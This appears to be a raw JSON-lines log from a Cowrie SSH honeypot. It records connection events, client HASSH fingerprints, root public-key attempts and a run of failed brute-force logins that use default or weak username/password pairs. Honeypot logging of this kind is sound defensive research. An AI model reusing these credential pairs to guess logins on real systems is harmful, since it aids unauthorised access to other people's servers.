{"eventid":"cowrie.login.failed","username":"user","password":"sasha1","message":"login attempt [user/sasha1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:24.591932Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51764,"dst_ip":"1.2.3.4","dst_port":22,"session":"f792b22a7814","protocol":"ssh","message":"New connection: 212.227.235.229:51764 (1.2.3.4:22) [session: f792b22a7814]","sensor":"my-vps","timestamp":"2025-08-28T03:53:24.660385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:53:24.661141Z","src_ip":"212.227.235.229","session":"f792b22a7814"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:53:24.769106Z","src_ip":"212.227.235.229","session":"f792b22a7814"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay12345","message":"login attempt [clay/clay12345] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:25.093600Z","src_ip":"212.227.235.229","session":"f792b22a7814"}
{"eventid":"cowrie.login.failed","username":"user","password":"pooh","message":"login attempt [user/pooh] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:25.664242Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:26.203366Z","src_ip":"212.227.235.229","session":"f792b22a7814"}
{"eventid":"cowrie.login.failed","username":"user","password":"pineappl","message":"login attempt [user/pineappl] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:26.773939Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:27.870154Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":63034,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d81daa01c4b","protocol":"ssh","message":"New connection: 45.125.211.194:63034 (1.2.3.4:22) [session: 0d81daa01c4b]","sensor":"my-vps","timestamp":"2025-08-28T03:53:34.660356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:53:34.674289Z","src_ip":"45.125.211.194","session":"0d81daa01c4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:53:34.876923Z","src_ip":"45.125.211.194","session":"0d81daa01c4b"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:35.713184Z","src_ip":"45.125.211.194","session":"0d81daa01c4b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:36.924975Z","src_ip":"45.125.211.194","session":"0d81daa01c4b"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:39.012313Z","src_ip":"212.227.235.229","session":"7cdb96a014e0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40033,"dst_ip":"1.2.3.4","dst_port":22,"session":"783c065c9ff3","protocol":"ssh","message":"New connection: 45.125.211.194:40033 (1.2.3.4:22) [session: 783c065c9ff3]","sensor":"my-vps","timestamp":"2025-08-28T03:53:49.412196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:53:49.430337Z","src_ip":"45.125.211.194","session":"783c065c9ff3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:53:49.630399Z","src_ip":"45.125.211.194","session":"783c065c9ff3"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:50.452753Z","src_ip":"45.125.211.194","session":"783c065c9ff3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:51.662591Z","src_ip":"45.125.211.194","session":"783c065c9ff3"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":55244,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3d3b07dac8","protocol":"ssh","message":"New connection: 45.125.211.194:55244 (1.2.3.4:22) [session: 4f3d3b07dac8]","sensor":"my-vps","timestamp":"2025-08-28T03:54:04.415835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:54:04.454826Z","src_ip":"45.125.211.194","session":"4f3d3b07dac8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:54:04.650228Z","src_ip":"45.125.211.194","session":"4f3d3b07dac8"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:54:05.516968Z","src_ip":"45.125.211.194","session":"4f3d3b07dac8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:06.738590Z","src_ip":"45.125.211.194","session":"4f3d3b07dac8"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":41221,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1314b6a2ec8","protocol":"ssh","message":"New connection: 45.125.211.194:41221 (1.2.3.4:22) [session: d1314b6a2ec8]","sensor":"my-vps","timestamp":"2025-08-28T03:54:19.277318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:54:19.302322Z","src_ip":"45.125.211.194","session":"d1314b6a2ec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:54:19.513684Z","src_ip":"45.125.211.194","session":"d1314b6a2ec8"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T03:54:20.388202Z","src_ip":"45.125.211.194","session":"d1314b6a2ec8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:21.609123Z","src_ip":"45.125.211.194","session":"d1314b6a2ec8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57324,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1a7f0557aa9","protocol":"ssh","message":"New connection: 217.72.205.35:57324 (1.2.3.4:22) [session: b1a7f0557aa9]","sensor":"my-vps","timestamp":"2025-08-28T03:54:26.906821Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:54:26.907871Z","src_ip":"217.72.205.35","session":"b1a7f0557aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52458,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1e7e81c1c30","protocol":"ssh","message":"New connection: 212.227.235.229:52458 (1.2.3.4:22) [session: f1e7e81c1c30]","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.386590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.387515Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.492915Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.706189Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.706834Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.814704Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:54:33.815360Z","src_ip":"212.227.235.229","session":"f1e7e81c1c30"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59216,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a8cf23ea881","protocol":"ssh","message":"New connection: 45.125.211.194:59216 (1.2.3.4:22) [session: 0a8cf23ea881]","sensor":"my-vps","timestamp":"2025-08-28T03:54:34.200980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:54:34.211348Z","src_ip":"45.125.211.194","session":"0a8cf23ea881"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:54:34.409703Z","src_ip":"45.125.211.194","session":"0a8cf23ea881"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T03:54:35.242276Z","src_ip":"45.125.211.194","session":"0a8cf23ea881"}
